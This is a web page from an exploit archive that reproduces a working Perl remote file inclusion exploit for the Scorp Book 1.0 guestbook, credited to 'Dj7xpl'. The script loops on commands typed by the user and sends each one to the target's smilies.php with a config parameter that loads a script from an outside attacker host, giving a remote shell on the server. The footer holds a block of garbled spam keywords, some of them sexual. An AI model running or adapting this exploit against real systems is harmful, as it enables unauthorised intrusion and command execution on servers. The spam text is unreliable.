about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Scorp Book 1.0 (smilies.php config) Remote File Inclusion Vulnerability




2007-04-08 Scorp Book 1.0 (smilies.php config) Remote File Inclusion Vulnerability
Rated as : High Risk

#!/usr/bin/perl
#                                                        
.-""""""""-.                       
         
#                                                        /   Dj7xpl   \   
                          
#                                                       |              |  
                             
#                                                       |,  .-.  .-.  ,|  
                             
#                                                       | )(_o/  \o_)( |  
                                  
#                                                       |/     /\     \|  
                              
#                                             (@_       (_     ^^     _)  
               
#                                        _     )
\_______\__|IIIIII|__/_______________________________
#                                      
(_)@8@8{}<________|-\IIIIII/-|________________________________>
#                                              )_/        \          / 
#                                              (@
#											   
#_______________________________________________Iranian Are The Best In
World___________________________________________#
#
#
#       [~] Portal.......:  Scorp Book v1.0
#	[~] Download.....:  http://www.ectona.org/download/?id=598&s=info
#	[~] Author.......:  Dj7xpl  | Dj7xpl@yahoo.com
#       [~] Class........:  Remote File Include Exploit
#
#_______________________________________________________________________________________________________________________#
#########################################################################################################################

use IO::Socket;
if (@ARGV < 2){
print "

    
+**********************************************************************+
     *                                                                    
 *
     *   # Scorp Book <== v1.0 (smilies.php) Remote File Include
Exploit    *
     *                                                                    
 *
     *   # Usage   :  xpl.pl [Target] [Path]                              
 *
     *                                                                    
 *
     *   # Example :  xpl.pl Dj7xpl.ir /gb                                
 *
     *                                                                    
 *
     *                       Vuln & Coded By Dj7xpl                       
 *
    
+**********************************************************************+

";
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];

print "\n[~] Please wait ...\n";

print "[~] Shell : ";$cmd = <STDIN>;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$host", PeerPort=>"80") or die
"Connect Failed.\n\n";
    print $socket "GET
".$path."/smilies.php?config=http://dj7xplby.ru/cmd?cmd=$cmd
HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
    {
        print $raspuns;
    }

    print "[~] Shell : ";
    $cmd = <STDIN>;
	}
securitydot.net - 2007-04-08

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 07:27:38 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
iixytideju arundhathi WWW.QUEEN8 Desi baba WWW.sexsur novell por Www pinkwo B.A.Result www.89sex. SERX VEDEY www.51308. Pricka cho WWW.QUEEN8 WWW.WOLD.S TITYS girl sex www.tongyo www.nltj16 thirisa.se www.qqtank www.tamise k5su SEXO+AO++V vbulletin Sexe giris sex.89.com dav educat ytao.zw78. Sexymalik www.686181 www.xex.vi www.xnw521 nud photos Kekilli se icmp dav educat maroc. Zi news for C 200 /compo mambo/inde Mar 200 /compo mambo Remo www.sh-jia queen boyz www.animal t659t www.mv863. www.africa